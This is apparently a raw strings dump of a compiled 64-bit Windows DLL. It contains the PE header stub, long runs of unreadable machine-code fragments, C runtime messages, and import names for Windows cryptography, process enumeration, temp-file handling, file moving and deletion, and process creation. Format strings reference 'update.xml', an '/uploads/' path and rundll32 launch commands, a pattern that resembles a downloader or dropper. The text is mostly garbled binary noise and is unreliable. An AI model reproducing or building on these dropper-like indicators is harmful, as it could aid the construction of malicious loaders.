!This program cannot be run in DOS mode. Rich .text `.rdata @.data .pdata @.rsrc @.reloc x ATAUAVH L$(3 yxxxI A^A]A\ D$ ~> T$PH D$PH T$PH T$PH L$PL D$PL+ L$ H D$ H L$dA D$ H L$ A D$dH T$ H D$ H T$ H L$ A D$dH T$dA D$dH D$ H T$ H D$dH T$dH D$dH T$dH L$dA T$ H D$dH T$ A D$ H L$dH D$dH D$ H D$ H D$ H D$dA D$ H L$dA T$ H T$ H D$dH T$ H D$ H D$X3 L$XH T$@H 9\$@ L$XE3 D$PH L$PH T$ H L$PH ;\$@s L$XH D$PH \$HH SUVWATH D$HH L$0L L$0I; d$0H D$0H L$HH3 PA\_^][ D$HL L$0L L$0H L$HH3 T$0A ;|$0 \$8H p WATAUAVAWH l$(H D$`H L$`H L$`I; |$`I; l$pH \$hH 0A_A^A]A\_ L$8L D$0E3 L$0H T$@H L$0H L$8H L$8L D$0E3 L$0H T$@H L$0H L$8H UVWH D$hH L$hL D$`H T$ H L$`H t;H;t$`v4H T$`D D$PH L$hH L$ H T$`H \$XH 0_^] T$ H T$PH uf!D$X3 D$\D D$(D D$dH D$hH;D$`v T$PH+D$`i WATAUAVAW t$xI D$xL D$xL D$ D \$pE; \$pA; L$pA; T$p; L$ H L$(H PHA; L$pA; P8A; \$pA; L$p; L$(H L$p; \$pH \$pA; d$xM; L$pH \$pH \$pA; |$ A |$ A L$pI; gfffD gfff gfffH D$`D |$XD t$PD l$HD |$pA; |$pI; P8A; |$pH uhI; L$xH d$xM; A_A^A]A\_ [ UVWATAUAVAWH D$PL T$pA l$hH; L$XI T$XL L$pL l$0E3 L$`D 9|$`u tNL; uLL; r-H; |$PH D$hH L$hM |$0E3 L$\H 9D$\tN D$xE3 D$HH D$@H l$8H l$0I D$hH; A_A^A]A\_^] WATAUAVAWH L$HE D$ H L$HH D$PE3 L$PE3 D$PH L$HH D$@E3 L$@H l$0H D$(E3 L$@H l$0H D$(E3 L$@H D$(E3 L$@H D$(E L$PH L$@H L$HH A_A^A]A\_ UVWATAUAVAWH D$8E3 L$@E u#M; L$(L |$$E3 L$ M L$PH D$ H DDPfA D$ # DLPHc D$"H DLPfA DDPfA FHcD$@L L$@H D$HH \$@A \$PH l$(H \$PH l$XH t$`H L$8D \$8L3 \$@H WATAUAVAWH )IcyHM a8M+ A;<$ L$0H >csm D$(H A;<$sr q I+ A;<$s\H s8H; A;<$r \$@I A_A^A]A\_ u,Hc \$0H t$8H |$@H \$0H l$8H t$@H \$0H t$8H |$@H \$0H \$0H 9MZu HcQ< LcA Runtime Error! Program: (null) Invalid parameter passed to C runtime function. !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ GetProcessWindowStation GetUserObjectInformationA GetLastActivePopup GetActiveWindow MessageBoxA ( 8PX 700WP `h```` xpxxxx ('8PW 700PP `h`hhh xppwpp !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ HH:mm:ss dddd, MMMM dd, yyyy MM/dd/yy December November October September August July June April March February January Saturday Friday Thursday Wednesday Tuesday Monday Sunday SunMonTueWedThuFriSat JanFebMarAprMayJunJulAugSepOctNovDec IsWow64Process alwo p Pf E%C GetSystemTimeAsFileTime GetModuleFileNameW SetErrorMode GetFileAttributesW TerminateProcess GetTempPathW MoveFileW CloseHandle GetWindowsDirectoryW DeleteFileW GetCurrentProcessId GetTempFileNameW GetFileSize MoveFileExW WriteFile ReadFile CreateFileW GetLastError ExitProcess VirtualQuery CreateProcessW VirtualFree OpenProcess SetLastError VirtualAlloc Process32FirstW Process32NextW CreateToolhelp32Snapshot GetEnvironmentVariableW GetCurrentProcess GetComputerNameW GetModuleHandleW WideCharToMultiByte GetVersionExW GetProcAddress LocalAlloc LocalFree FindResourceW LoadResource SizeofResource LockResource HeapFree HeapAlloc HeapReAlloc FlsSetValue GetCommandLineA UnhandledExceptionFilter SetUnhandledExceptionFilter RtlVirtualUnwind RtlLookupFunctionEntry RtlCaptureContext HeapSetInformation HeapCreate HeapDestroy GetStdHandle GetModuleFileNameA OutputDebugStringA EncodePointer DecodePointer FlsFree FlsGetValue GetCurrentThreadId FlsAlloc GetCPInfo GetACP GetOEMCP SetHandleCount GetFileType GetStartupInfoW DeleteCriticalSection FreeEnvironmentStringsW GetEnvironmentStringsW QueryPerformanceCounter GetTickCount RtlUnwindEx LeaveCriticalSection EnterCriticalSection InitializeCriticalSectionAndSpinCount LoadLibraryW SetFilePointer GetConsoleCP GetConsoleMode MultiByteToWideChar Sleep LCMapStringW GetStringTypeW SetStdHandle WriteConsoleW VirtualProtect SetThreadStackGuarantee GetSystemInfo FlushFileBuffers KERNEL32.dll wsprintfW USER32.dll CryptAcquireContextW CryptDeriveKey CryptReleaseContext CryptGenRandom CryptEncrypt CryptCreateHash CryptDestroyKey CryptDecrypt CryptDestroyHash CryptHashData OpenProcessToken GetUserNameW GetTokenInformation EqualSid AllocateAndInitializeSid FreeSid ADVAPI32.dll CoTaskMemFree CoCreateInstance CoUninitialize CoInitializeEx ole32.dll ABABABABABABABABABAB.dll start abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD mscoree.dll (null) USER32.DLL ((((( H h(((( H H CONOUT$ kernel32 https https https version %s%s%d%d%s COMMONPROGRAMFILES(x86) %s\%s rundll rundll32 rundll32 BINARY Microsoft Enhanced Cryptographic Provider v1.0 Microsoft Enhanced Cryptographic Provider v1.0 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+- Microsoft Enhanced Cryptographic Provider v1.0 Microsoft Enhanced Cryptographic Provider v1.0 Process id: %lu %s/%s%s %s\Temp\%s %s%s %s%d%dupdate.xml %s/%d%dupdate.xml %s/uploads/%d%d%d%d%d%d%d%d%d%s rundll32.exe "%s",%S %s%s rundll32.exe